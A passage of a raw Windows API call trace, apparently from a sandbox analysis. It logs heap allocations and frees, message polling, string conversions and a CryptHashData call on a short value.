lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0267.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0267.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0267.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0267.956] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0267.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0267.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0267.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0267.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0267.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0267.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0267.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0267.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0267.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0267.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0267.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f38 [0267.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0267.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0267.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0267.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0267.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55048, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0267.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0267.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0267.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0267.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0267.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0267.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0267.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0267.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0267.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0267.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0267.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0267.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0267.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0267.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0267.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0267.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0267.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0267.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0267.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0267.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0267.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0267.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0267.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0267.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0267.957] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0267.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0267.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0267.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0267.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0267.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0267.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0267.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0267.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0267.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0267.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0267.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0267.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0267.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0267.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0267.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0267.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0267.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55018 [0267.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0267.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0267.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0267.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0267.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0267.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0267.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0267.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0267.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0267.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0267.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0267.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0267.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0267.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0267.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0267.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0267.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0267.959] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0267.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0267.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0267.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0267.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0267.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0267.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0267.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0267.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0267.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0267.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0267.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0267.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0267.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0267.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55068 [0267.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0267.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0267.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0267.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0267.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55078, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0267.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0267.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0267.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0267.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0267.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0267.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0267.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55078 [0267.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0267.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0267.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0267.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0267.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0267.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0267.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0267.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0267.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0267.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0267.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0267.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.960] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0267.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0267.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0267.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0267.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0267.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0267.961] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0267.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0267.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518f8 [0267.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0267.961] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0267.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0267.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0267.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0267.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0267.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0267.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0267.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0267.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0267.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0267.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0267.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0267.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0267.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0267.962] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0267.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51dd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0267.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0267.962] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0267.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0267.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0267.962] CryptHashData (hHash=0xa87490, pbData=0x2e55018, dwDataLen=0x3, dwFlags=0x1) returned 1 [0267.962] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55278 [0267.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55308 [0267.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55188 [0267.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0267.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55168 [0267.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0267.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0267.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0267.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0267.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0267.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0267.963] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0267.963] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55288 [0267.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0267.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0267.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55228 [0267.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0267.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0267.963] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0267.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0267.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51da8 [0267.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0267.964] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0267.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55268 [0267.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55298 [0267.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0267.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0267.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0267.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0267.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0267.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0267.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55298 [0267.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0267.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0267.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0267.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0267.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0267.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0267.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0267.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55188 [0267.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0267.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0267.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0267.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0267.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0267.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55168 [0267.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0267.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0267.965] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0267.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0267.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0267.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51dc0 [0267.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0267.965] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0267.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55158 [0267.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552b8 [0267.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0267.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0267.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0267.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0267.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0267.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0267.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552a8 [0267.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0267.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0267.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0267.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55148 [0267.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0267.965] RtlAllocateHeap (HeapHandle=0x970000, 